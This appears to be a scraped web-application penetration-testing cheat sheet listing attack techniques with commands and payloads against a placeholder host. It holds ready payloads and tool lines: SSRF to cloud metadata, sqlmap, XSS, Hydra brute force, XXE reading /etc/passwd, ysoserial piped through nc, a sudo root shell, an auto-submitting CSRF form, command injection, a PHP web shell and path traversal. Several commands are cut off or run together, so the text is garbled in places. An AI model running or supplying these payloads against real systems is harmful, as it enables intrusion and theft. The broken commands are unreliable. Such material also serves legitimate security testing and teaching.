.png)
5 hours ago
6 BOOK THIS SPACE FOR AD
ARTICLE AD
Broken Access Control
Test Method: Bypass user authentication or try unauthorized access to data.
Example: IDOR (Insecure Direct Object Reference)
1. Intercept the request using Burp Suite or Postman.
2. Modify the 'user_id' or 'document_id' to a different value.
Example request:
GET /user/profile?user_id=1234 HTTP/1.1
Host: target.com
Cookie: sessionid=abcd1234
3. Change the ID:
GET /user/profile?user_id=5678 HTTP/1.1
Host: target.com
Cookie: sessionid=abcd1234
Check if unauthorized information is accessible.
Force Browsing Admin URLs:
wfuzz -c -z file,/path/to/wordlist.txt --hc 404
https://target.com/admin/
Sensitive Data Exposure
Test Method: Find exposed credentials, API keys, and other
sensitive data in requests or responses.
Searching JavaScript for Exposed Keys
Command:
/path/to/website/
Capturing Traffic with Wireshark
1. Command to capture HTTP traffic:
2. Filter HTTP traffic for sensitive keywords: http contains
"password"
SSRF (Server-Side Request Forgery)
Test Method: Use SSRF to send unauthorized requests
from the server.
Testing SSRF with Burp Suite
1. Intercept an HTTP request where a URL is passed to the
server (e.g., 'http://example.com’).
2. Change the URL to
http://169.254.169.254/latest/meta-data/ (AWS metadata
service).
3. If internal metadata is returned, SSRF is present.
Test SSRF with Curl:
curl -X POST -d "url=http://localhost:8080/admin"
https://target.com/ssrf-test
SQL Injection
Test Method: Inject SQL into inputs and check for errors or
data leakage.
Basic SQL Injection via Input Fields
1. Test Payload:
2. Insert it into any vulnerable form (e.g., Login page).
Testing with SQLmap:
sqlmap -u "https://target.com/login.php?id=1" --dbs --batch
XSS (Cross-Site Scripting)
Test Method: Inject JavaScript to execute scripts in the
victim’s browser.
Basic Reflected XSS Test
1. Payload:
2. Insert this into a search form or URL query string.
Command with Curl:
curl
"https://target.com/search?q=<script>alert(’XSS’)</script>"
Broken Authentication
Test Method: Brute-force login attempts or find exposed
default credentials.
Brute Force with Hydra
Command:
target.com http-post-form
"/login:username=^USER^&password=^PASS^:Invalid login"
Check for Default Credentials
Command:
target.com
Security Misconfiguration
Test Method: Look for misconfigured servers, missing security headers, and exposed directories.
Check for Open Ports with Nmap:
nmap -p- -T4 target.com
Check Missing Headers with Curl:
Command:
"X-Frame-Options|Strict-Transport-Security|X-Content-Type
-Options"
Insecure APIs
Test Method: Identify insecure or unauthenticated APIs.
Check for Insecure APIs
Command:
"Authorization: Bearer invalidtoken"
Brute Force API Endpoints with ffuf:
ffuf -u https://target.com/api/FUZZ -w api-endpoints.txt
Web Timing Attacks
Test Method: Perform timing-based attacks to infer valid
usernames.
Measure Login Response Times
1. Command:
"username=admin&password=wrong"
https://target.com/login
Compare response times for valid vs. invalid usernames.
Exposure of Developer Secrets
Test Method: Check for exposed credentials in repositories.
Search GitHub for Exposed Secrets
Command:
cd repo
grep -r "password\|secret\|API_KEY"
Use TruffleHog to Detect Secrets
Command:
https://github.com/target/repo.git
Broken Authentication (using hydra)
Risk: Attackers can impersonate legitimate users, bypass
authentication, or escalate privileges.
Commands and Tools:
- Brute Force Authentication with Hydra (HTTP):
admin -P /path/to/wordlist.txt http-get://target.com/login
- Brute Force Authentication with Burp Suite (Intruder):
1.
Intercept login request in Burp Suite.
2. Send it to Intruder.
3. Use wordlist for usernames and passwords.
XML External Entity (XXE) Injection
Risk: Attackers can exploit the XML parser to read files on
the server, perform denial of service (DoS) attacks, or even
execute remote code.
Commands and Tools:
- Exploiting XXE (in XML file upload or parsing vulnerability):
<!DOCTYPE foo [<!ENTITY xxe SYSTEM
"file:///etc/passwd">]> <foo>&xxe;</foo>
- Using Burp Suite for XXE Testing:
1. Intercept XML request
in Burp Suite.
2. Modify XML data to include external entity.
3. Forward the request.
Insecure Deserialization
Risk: Attackers can manipulate serialized objects, leading
to remote code execution, privilege escalation, or data
modification.
Commands and Tools:
- Testing for Insecure Deserialization with ysoserial (Java):
java -jar ysoserial.jar CommonsCollections1 "command to
execute" | nc target.com 1234
- Testing with Python (Pickle Vulnerabilities):
importpickle malicious_object = pickle.loads(b"malicious pickled
data")
Privilege Escalation via Sudo (Linux)
Risk: Attackers who have low-level access can escalate to
root privileges.
Commands and Tools:
- Check Sudo Permissions:
- Privilege Escalation with Sudo:
sudo /bin/bashCross-Site Request Forgery (CSRF)
Risk: An attacker tricks a logged-in user into performing an
unintended action on a web application, potentially
compromising data or settings.
Commands and Tools:
- Crafting a CSRF Attack (HTML + JavaScript):
action="https://target.com/change_password"
method="POST"><input type="hidden" name="password"
value="newpassword"><input type="submit"
value="Submit"></form><script>document.forms[0].submit
();</script>
Cross-Site Script Inclusion (XSSI)
Risk: Allows attackers to steal sensitive data from a web
application by including script files that leak information.
Commands and Tools:
- Exploiting XSSI:
src="https://target.com/sensitive-data"></script>
- Test for XSSI with Burp Suite:
1. Intercept the request that
includes sensitive data in a script response.
2. Analyze exposed data.
Command Injection
Risk: Attackers can inject commands into a vulnerable
application, which then executes them on the underlying
system.
Commands and Tools:
- Testing for Command Injection (Web Input):
"https://target.com/command?input=test; id"
- Using Burp Suite:
1. Intercept form or URL parameter.
2.
Add semicolon (`;`) to input followed by a command (e.g.,
`id`).
3. Check response.
Unrestricted File Upload
Risk: Attackers can upload malicious files, such as web
shells or PHP scripts, allowing them to execute arbitrary
code on the server.
Commands and Tools:
- Uploading a PHP Web Shell:
system($_GET[’cmd’]); ?>
- Exploiting Unrestricted File Upload with Burp Suite:
1.
Intercept file upload request.
2. Modify `Content-Type` and
file extension.
3. Upload file and execute.
Directory Traversal
Risk: Attackers can access restricted directories or files
outside of the web root by manipulating file paths.
Commands and Tools:
- Testing for Directory Traversal:
"https://target.com/files/../../../etc/passwd"
- Automated Directory Traversal Testing with Burp Suite:
1.
Intercept file access request.
2. Modify URL to include
directory traversal (`../../../`).
3. Check response.
Bengali (Bangladesh) · 
English (United States) ·